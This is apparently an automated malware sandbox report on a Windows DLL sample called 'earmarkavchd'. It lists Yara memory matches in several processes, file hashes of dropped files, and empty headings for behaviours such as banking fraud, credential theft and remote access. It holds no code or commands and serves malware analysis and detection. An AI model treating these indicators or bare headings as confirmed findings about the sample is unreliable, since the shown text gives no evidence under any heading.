Source: Yara match	File source: 0000001D.00000000.369710445.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271814846.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271908704.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.271854980.00000000037B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.368074144.0000000002AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 4396, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 6996, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7164, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 3472, type: MEMORY
Source: Yara match	File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY

ID:	321067
Product:	CloudBasic
Start time:	10:39:43
Start date:	20.11.2020
Sample:	earmarkavchd
Cookbook:	default.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	78b3444199a2932805d85cfdb30ad6fb
SHA1:	a1826a8bdd4aa6fc0bf2157a6063cca5534a3a46
SHA256:	66eaf5c2bc2ec2a01d74db9cc50744c748388cd9b0fa1f07181e639e128803ef
Filetype:	Win32 Dynamic Link Library (generic) (1002004/3) 99.60%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{E7B188DA-2B5F-11EB-90E5-ECF4BB570DC9}.dat	Microsoft Word Document	39A087424113DAB76746C473B962CCDF	37333788BB5034EBF054F9B8FA4725805EDEEA4B	9F36720DB3F666EDECD263F45FDE0C78BA2F63FA344B370EE1515BD807294A7C
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E7B188DC-2B5F-11EB-90E5-ECF4BB570DC9}.dat	Microsoft Word Document	F6B7C5ED12A9942C076D7FB3EFF63F0D	1AB04C5899B73236631278FC374581BDA263D00E	3310351BC2D9C9320770858EBA4C9216AD01C1378CDB2C2D3F46E05F5B6FBD0A
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{E7B188DE-2B5F-11EB-90E5-ECF4BB570DC9}.dat	Microsoft Word Document	5BC10B1192CAC6C78FA858B9F51F72FA	0968CE310F38DB37C5ECDD05717A8BE189AC902A	068F18C1A8310266274B1AB784A062DCFC260B37B392B8C8B68AAE1234FDDEE9
C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{EE1C3C84-2B5F-11EB-90E5-ECF4BB570DC9}.dat	Microsoft Word Document	533DFB9F9EF180001FC0301F47D39986	2BF981944AF92FC3E80D059B70D8664E9718190E	3DB839564667865DDC2525DA98F280DA6CCC9E0279D52C89244D82EF1DFBEB90
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4PB7FJMT\70R8a3b9[1].htm	ASCII text, with very long lines, with no line terminators	99911885EF8527B9BB520959D0400D23	A214A86649EBA314D4BF4C1ED2AC48CAC7EEBA1B	6A56806C098AA9CD6ADFD325BE3E9A05FDA817BD175A469A5027339EEA4C9058
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\B87Z87FM\X[1].htm	ASCII text, with very long lines, with no line terminators	FC226C805B21348897F9CF750630EBA6	5F20971E026402B862B9A62A6B4CCCE997BFE90E	B2BA15FFD15238328B301C92BC4CB4CA7C5B500826146DBFACB98B261E12FB31
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\3js[1].htm	ASCII text, with very long lines, with no line terminators	03D61BB1F49164FA9812A5E896C67F3E	85FA697A67481A5631B61FB3F539B4503B929EA1	CDE50C5D8FC8B941FD19E1F70B357635061FBFE6F9A0D5BD4C0CFD9F46BF8436
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	1F1446CE05A385817C3EF20CBD8B6E6A	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	C85C42A32E22DE29393FCCCCF3BBA96E	EAF3755C63061C96400536041D4F4EB8BC66E99E	9022F6D5F92065B07E1C63F551EC66E19B13E067C179C65EF520BA10DA8AE42C
C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.0.cs	UTF-8 Unicode (with BOM) text	216105852331C904BA5D540DE538DD4E	EE80274EBF645987E942277F7E0DE23B51011752	408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	4A5ABBCCDAEABEB5A5A2E91C499C9AAE	6EAE4E4AF91EB7A27A3C2A24DB4BDAA390BA0910	0DE61DDD93445146459E5AFE000A60D9D8FB135A2CAAC95F33701EA1BFDB776E
C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	4F7A3D12C99935CEDE22FC48B24A0DF8	D1E697A33A6E3D72C52D9EA295C7846F460B1D4F	D1119EBD5877945573542A86D6695261FA02F828254609E3C8D9719F687961BA
C:\Users\user\AppData\Local\Temp\3he3buld\3he3buld.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\3he3buld\CSCBE830862A12C4DC4815ABE234EBA2CD.TMP	MSVC .res	9F396BC464094036521D8E5436A7A385	A9D93526053ADBE816D90546F1203AB76285AB97	DEEC56A6C5E18A967A16667642CDDF981EC7B5F737BDA583C0FFACF1E3D267F9
C:\Users\user\AppData\Local\Temp\6110.bi1	ASCII text, with CRLF line terminators	5B3345909519932D6670D92F16496463	6CCABAAC9315486C106AB1BBB7E6F153F5C1A3BD	0B5C0F6FFAC14107357E2C1BFE0DEA06932FD2AA5C8BD598A73F25655F0ABFD5
C:\Users\user\AppData\Local\Temp\JavaDeployReg.log	ASCII text, with CRLF line terminators	265B5A949C8ACDA4E010CB4D846E09E5	175F85111C7777D378E99115202D1873E9A6DF6C	D2095E1496FEC54784E4DC7FDDBF683604D470E414319881B4545F1278CA7B8B
C:\Users\user\AppData\Local\Temp\RES47A8.tmp	data	46AF343D2B51BE51692F6C7C859211CC	EE9CDF511E2FAB41C67DECD86C27532A64432EE4	FFFC76A20030AFDC97ACB1C11A4A537BD556D54A64843A4BD9BA8EEEB0EF446A
C:\Users\user\AppData\Local\Temp\RES5D63.tmp	data	B82724412BAA9C5AD2E1DDDEC01C1246	CCEDDCF15EFE0AC0E5B77F8FC68CC591F34FAB7F	2E8866D5622035D59B52BB4882CAEEE1D7B158095D33DE9915015E855001D818
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fqnczgio.wj0.psm1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xzvcmevw.tol.ps1	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Temp\l4vfe2li\CSC4DA260FDB3A0492587313FAF41D3B261.TMP	MSVC .res	FDD8EDB0A1FA528A144B42FDF36494BC	90EAE949F2B3EEDE7D91E8FA102584BCA20C380D	A8C2BC877B56C5EED1F721675B2AFA60B2C0925D574A13DD9D6D8F2CD9B21C90
C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.0.cs	UTF-8 Unicode (with BOM) text	D318CFA6F0AA6A796C421A261F345F96	8CC7A3E861751CD586D810AB0747F9C909E7F051	F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.cmdline	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators	C686ECD4A4EAD39E76CFD3B2CB0B81C2	4A2FFCA4978B26032FD1DBBE54076E54C20DFBA7	7DCA09273F52CD414AFF117A0F0EF46FC939D8D3E05F96CF713914B13BB2D2F1
C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.dll	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows	FAF0CA62797A98B0959BCFD55B2076BB	8ED19CF99C5C7ED52D74B187B982DAE084B7DC23	BAB4A735428F0C29D96A657B52F652B77BF49990A9E224950C6A0D5A6D9AB673
C:\Users\user\AppData\Local\Temp\l4vfe2li\l4vfe2li.out	ASCII text, with CRLF, CR line terminators	83B3C9D9190CE2C57B83EEE13A9719DF	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
C:\Users\user\AppData\Local\Temp\~DF8A42D4F7A1FD7067.TMP	data	750B73DCD5BFD7D736568D9D9219E43F	2AF66EF9018DF352B06D1331736A46EF2AE8DC7B	486748DCD92BCCA5CD105B5C857B182854CA618065F1DA587176AEF3AF7806F9
C:\Users\user\AppData\Local\Temp\~DF8D4ABBA65E1CB9D5.TMP	data	C42368D425EEEF796EF64558AA6C90D7	F6EF9B9D4330D757A14F00358E75DF51662A30E9	8676A5E991DF64865298B5EE7A697F49324AC52D95B05153CEAE858CB4AC93D0
C:\Users\user\AppData\Local\Temp\~DFA6B98D9B8879D55E.TMP	data	E7E8858256E8C3F27BC233E808C8B7EC	0EB6724373397DD14BF1C3F5CA271543B68820D7	A8EED53073F1F2F533DEB37E81CD63F1174FC625C16C16D1E407FB56FF9E3DF2
C:\Users\user\AppData\Local\Temp\~DFE301123F8B433546.TMP	data	FC04AF509AA295DEE603295868CC79A6	62D84FAEBA4D9552807ABE7BCAFAF3D4701F9FF0	8270BD263420603C4E422FECFADC31821F4DE93C95174268D05F058EF9A4F2CB
C:\Users\user\AppData\Roaming\Microsoft\{FC666F93-2B96-8EB5-95F0-8FA2992433F6}	ASCII text, with CRLF line terminators	3418C8F32280DA5078B745DF13941B38	84546836A9604F73475945BD747F2541CCF0B428	26985166240DE36AD986CD306B86C9015175F5405F1838F2AE490C461059D8DE
C:\Users\user\Documents\20201120\PowerShell_transcript.226533.hOm00WWB.20201120104111.txt	UTF-8 Unicode (with BOM) text, with CRLF line terminators	62A4AEF67AB037FD0F70D4229FEFAAB0	00D16EE7459620C85C77E6BBA60464FCB9752D7D	9738467C569FDAD975FCDDB8FD47695DC562E38D50AC264B22AD4AF205C6002B
\Device\ConDrv	ASCII text, with CRLF, CR line terminators	D796BA3AE0C072AA0E189083C7E8C308	ABB1B68758B9C2BF43018A4AEAE2F2E72B626482	EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E

Analysis Report earmarkavchd

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs